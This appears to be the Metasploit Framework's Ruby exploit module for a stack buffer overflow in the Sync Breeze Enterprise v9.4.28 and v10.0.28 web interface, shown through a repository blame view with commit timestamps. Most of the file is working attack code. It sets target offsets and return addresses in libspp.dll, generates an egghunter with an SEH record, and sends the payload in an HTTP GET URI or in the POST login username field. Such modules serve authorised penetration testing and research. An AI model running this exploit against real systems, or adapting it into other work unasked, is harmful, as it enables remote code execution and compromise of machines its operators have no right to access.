metasploit-framework/modules/exploits/windows/http/syncbreeze_bof.rb

166 lines
4.1 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sync Breeze Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of Sync Breeze Enterprise v9.4.28 and v10.0.28, caused by
improper bounds checking of the request in HTTP GET and POST requests
sent to the built-in web server. This module has been tested
successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira',
'Andrew Smith', # MSF support for v10.0.28
'Owais Mehtab' # Original v10.0.28 exploit
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
'Space' => 500
},
'Targets' =>
[
2017-10-13 21:53:22 +00:00
[
'Automatic', {}
],
[ 'Sync Breeze Enterprise v9.4.28',
{
'Offset' => 2488,
'Ret' => 0x10015fde # POP # POP # RET [libspp.dll]
}
],
[ 'Sync Breeze Enterprise v10.0.28',
{
'Offset' => 780,
'Ret' => 0x10090c83 # JMP ESP [libspp.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Mar 15 2017',
'DefaultTarget' => 0))
end
2017-10-13 21:53:22 +00:00
def get_product_name
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
2017-10-13 21:53:22 +00:00
product_name = res.body.scan(/(Sync Breeze Enterprise v[^<]*)/i).flatten.first
return product_name if product_name
end
nil
end
def check
product_name = get_product_name
return Exploit::CheckCode::Unknown unless product_name
if product_name =~ /9\.4\.28/ || product_name =~ /10\.0\.28/
return Exploit::CheckCode::Appears
elsif product_name =~ /Sync Breeze Enterprise/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
2017-10-13 21:53:22 +00:00
def get_target_name
if target.name != 'Automatic'
print_status("Target manually set as #{target.name}")
return target
else
print_status('Automatically detecting target...')
end
2017-10-13 21:53:22 +00:00
case get_product_name
when /9\.4\.28/
print_status('Target is 9.4.28')
return targets[1]
when /10\.0\.28/
print_status('Target is 10.0.28')
return targets[2]
else
nil
end
end
2017-10-13 21:53:22 +00:00
def exploit
tmp_target = target
case get_target_name
when targets[1]
target = targets[1]
eggoptions = {
checksum: true,
eggtag: rand_text_alpha(4, payload_badchars)
}
hunter, egg = generate_egghunter(
payload.encoded,
payload_badchars,
eggoptions
)
sploit = rand_text_alpha(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << hunter
sploit << make_nops(10)
sploit << egg
sploit << rand_text_alpha(5500)
print_status('Sending request...')
send_request_cgi(
'method' => 'GET',
'uri' => sploit
)
2017-10-13 21:53:22 +00:00
when targets[2]
target = targets[2]
uri = "/login"
sploit = rand_text_alpha(target['Offset'])
sploit << [target.ret].pack('V')
sploit << rand_text(4)
make_nops(10)
sploit << payload.encoded
print_status('Sending request...')
send_request_cgi(
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'username' => "#{sploit}",
'password' => "rawr"
}
)
2017-10-13 21:53:22 +00:00
else
print_error("Exploit not suitable for this target.")
end
2017-10-13 21:53:22 +00:00
ensure
target = tmp_target
end
end